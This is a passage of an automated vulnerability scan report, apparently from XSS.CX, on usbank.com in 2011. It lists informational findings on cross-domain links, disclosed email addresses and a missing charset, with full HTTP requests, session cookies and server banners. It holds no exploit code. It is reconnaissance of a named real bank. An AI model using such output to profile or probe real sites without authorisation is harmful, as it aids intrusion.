<li><a href="https://carenet.fnfismd.com/usbank/ACCLogin.jsp">Pay &amp; View Your Mortgage</a>
...[SNIP]...

5.3. http://www.usbank.com/usbanklocations/LanguageController  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usbank.com
Path:   /usbanklocations/LanguageController

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /usbanklocations/LanguageController?target=search&language=es HTTP/1.1
Host: www.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_lv%3D1300275619538%7C1394883619538%3B%20s_lv_s%3DFirst%2520Visit%7C1300277419538%3B%20s_nr%3D1300275619542-New%7C1473075619542%3B%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_invisit%3Dtrue%7C1300277419545%3B%20sc_visit_start%3D1%7C1300277419564%3B%20s_visitStart%3D1%7C1300277419566%3B%20s_prevPage%3DPersonal%2520Home%2520Page%7C1300277419567%3B; WT_FPC=id=268076e74370df281811300264817909:lv=1300264817909:ss=1300264817909; s_sess=%20s_cc%3Dtrue%3B%20s_linkTrack%3D%3B%20s_sq%3D%3B%20s_ppv%3D77%3B; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; USBHOMEPAGEPREF=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html; charset=ISO-8859-1
Content-Language: es
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: JSESSIONID=00004FoA-jF_i-zN2rstltnCFTj:-1; Path=/usbanklocations
Server: WebSphere Application Server/6.1
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 11:59:49 GMT
Connection: close
Content-Length: 25381


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=117565&p=irol-financialinfo">Financials &amp; SEC Filings</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=117565&p=irol-govhighlights">Corporate Governance</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=117565&p=irol-stockquote">Stock Quote</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=117565&p=irol-presentations">Webcasts &amp; Presentations</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=117565&p=irol-quarterlyearnings">Quarterly Earnings Release</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=117565&p=irol-proxy">Annual Report</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=117565&p=irol-news&nyo=0">Press Releases</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=117565&p=irol-alerts&t=&id=">Receive News by Email</a>
...[SNIP]...

6. Email addresses disclosed  previous  next
There are 3 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


6.1. http://www.usbank.com/cgi_w/cfm/about/online_security/online_fraud.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usbank.com
Path:   /cgi_w/cfm/about/online_security/online_fraud.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /cgi_w/cfm/about/online_security/online_fraud.cfm HTTP/1.1
Host: www.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_lv%3D1300275619538%7C1394883619538%3B%20s_lv_s%3DFirst%2520Visit%7C1300277419538%3B%20s_nr%3D1300275619542-New%7C1473075619542%3B%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_invisit%3Dtrue%7C1300277419545%3B%20sc_visit_start%3D1%7C1300277419564%3B%20s_visitStart%3D1%7C1300277419566%3B%20s_prevPage%3DPersonal%2520Home%2520Page%7C1300277419567%3B; WT_FPC=id=268076e74370df281811300264817909:lv=1300264817909:ss=1300264817909; s_sess=%20s_cc%3Dtrue%3B%20s_linkTrack%3D%3B%20s_sq%3D%3B%20s_ppv%3D77%3B; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; USBHOMEPAGEPREF=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 12:00:12 GMT
Connection: close
Content-Length: 17731


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<title>Recognize Online Fraud</title>

<link rel="stylesheet" href="/en/legacy/style/global/global.css" type=
...[SNIP]...
<a class="contentcopy" href="/cgi_w/cfm/about/online_security/reporting.cfm">fraud_help@usbank.com</a>
...[SNIP]...

6.2. http://www.usbank.com/en/js/global/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usbank.com
Path:   /en/js/global/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /en/js/global/s_code.js HTTP/1.1
Host: www.usbank.com
Proxy-Connection: keep-alive
Referer: http://www.usbank.com/en/PersonalHome.cfm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: USBHOMEPAGEPREF=; WT_FPC=id=268076e74370df281811300264817909:lv=1300264817909:ss=1300264817909

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 02 Dec 2010 19:36:49 GMT
Accept-Ranges: bytes
ETag: "809ee435892cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 11:40:22 GMT
Content-Length: 35175

...var s_url=document.location.hostname.toString();if(s_url.indexOf("localhost")>-1||s_url.indexOf("bank-dns.com")>-1||s_url.indexOf("uat")>-1||s_url.indexOf("it")>-1||s_url.indexOf("c:")>-1||s_url.in
...[SNIP]...
`C$6)#9=s.mr($E,(vt@wt`Yvt)`cs.hav()+q+(qs?qs:s.rq()),0,id,ta);qs`f;`Qm('t')`5s.p_r)s.p_r(`I`Z`f}^F(qs);}`h{`u($5;`l$5`d^D,`G$Q1',vb`I$I^B=s.`P`r=s.`P^O=`H`k`f`5s.pg)`H@I$I`H@Ieo=`H@I`P`r=`H@I`P^O`f`5!id@Xs.tc@Gtc=1;s.flush`T()}`2#9`Btl`0o,t,n,vo`3;@4=$Ko`I`P^O=t;s.`P`r=n;s.t($5}`5pg){`H@Ico`0o){`R^r\"_\",1,$A`2$Ko)`Bwd@Igs`0u$f`R^run,1,$A`2s.t()`Bwd@Idc`0u$f`R^run,$A`2s.t()}}@7=(`H`L`i`8`4'@Ps^v0`Id=^U;s.b
...[SNIP]...

6.3. http://www.usbank.com/js/frameworks/jquery/jquery-1.4.2.js  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usbank.com
Path:   /js/frameworks/jquery/jquery-1.4.2.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/frameworks/jquery/jquery-1.4.2.js HTTP/1.1
Host: www.usbank.com
Proxy-Connection: keep-alive
Referer: http://www.usbank.com/checking/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: USBHOMEPAGEPREF=; WT_FPC=id=268076e74370df281811300264817909:lv=1300264817909:ss=1300264817909; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; s_pers=%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_lv%3D1300278064513%7C1394886064513%3B%20s_lv_s%3DFirst%2520Visit%7C1300279864513%3B%20s_nr%3D1300278064520-New%7C1473078064520%3B%20s_invisit%3Dtrue%7C1300279864523%3B%20sc_visit_start%3D1%7C1300279864526%3B%20s_visitStart%3Dno%2520value%7C1300279864530%3B%20s_prevPage%3DPersonal%2520Home%2520Page%7C1300279864533%3B; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D77%3B%20s_linkTrack%3DPersonal%2520Home%2520Page%255E%255EChecking%255E%255EPersonal%2520Home%2520Page%2520%257C%2520Checking%255E%255E%3B%20s_sq%3Dusbankcom%253D%252526pid%25253DPersonal%25252520Home%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.usbank.com%2525252Fchecking%2525252Findex.html_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 07 Dec 2010 22:33:59 GMT
Accept-Ranges: bytes
ETag: "80a518d75e96cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 12:21:12 GMT
Content-Length: 176010

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Incl
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

7. HTML does not specify charset  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usbank.com
Path:   /cust_serv_cs.html

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /cust_serv_cs.html HTTP/1.1
Host: www.usbank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: USBHOMEPAGEPREF=; WT_FPC=id=268076e74370df281811300264817909:lv=1300264817909:ss=1300264817909; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; mbox=check#true#1300278129|session#1300278068498-162067#1300279929; CookieEnabled=true; s_pers=%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_lv%3D1300278074758%7C1394886074758%3B%20s_lv_s%3DFirst%2520Visit%7C1300279874758%3B%20s_nr%3D1300278074763-New%7C1473078074763%3B%20s_invisit%3Dtrue%7C1300279874764%3B%20sc_visit_start%3D1%7C1300279874766%3B%20s_visitStart%3Dno%2520value%7C1300279874768%3B%20s_prevPage%3Dusb%253Achecking%253Aindex.html%7C1300279874769%3B; s_sess=%20s_linkTrack%3DPersonal%2520Home%2520Page%255E%255EChecking%255E%255EPersonal%2520Home%2520Page%2520%257C%2520Checking%255E%255E%3B%20s_ria%3Dflash%252010%257Csilverlight%25204.0%3B%20s_ppv%3D73%3B%20s_cc%3Dtrue%3B%20SiteC_LINKS%3Dusb%253Achecking%253Aindex.html%255E%255ELog%2520In%2520to%2520Your%2520Account%255E%255Eusb%253Achecking%253Aindex.html%2520%257C%2520Log%2520In%2520to%2520Your%2520Account%255E%255E%3B%20s_sq%3Dusbankcom%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fwww.usbank.com%2525252Fchecking%2525252Findex.html%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww4.usbank.com%2525252FinternetBanking%2525252FRequestRouter%2525253FrequestCmdId%2525253DDisplayLoginPage_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; CAMPID=""

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 06 Sep 2005 23:32:13 GMT
Accept-Ranges: bytes
ETag: "803c62353bb3c51:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 12:22:09 GMT
Content-Length: 393

<!--- Converted for SR12850 5.2005 ljq --->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<SCRIPT language="JavaScript1.1">
<!--
location.replace("/cgi_w/c
...[SNIP]...

Report generated by XSS.CX at Thu Mar 17 15:27:44 CDT 2011.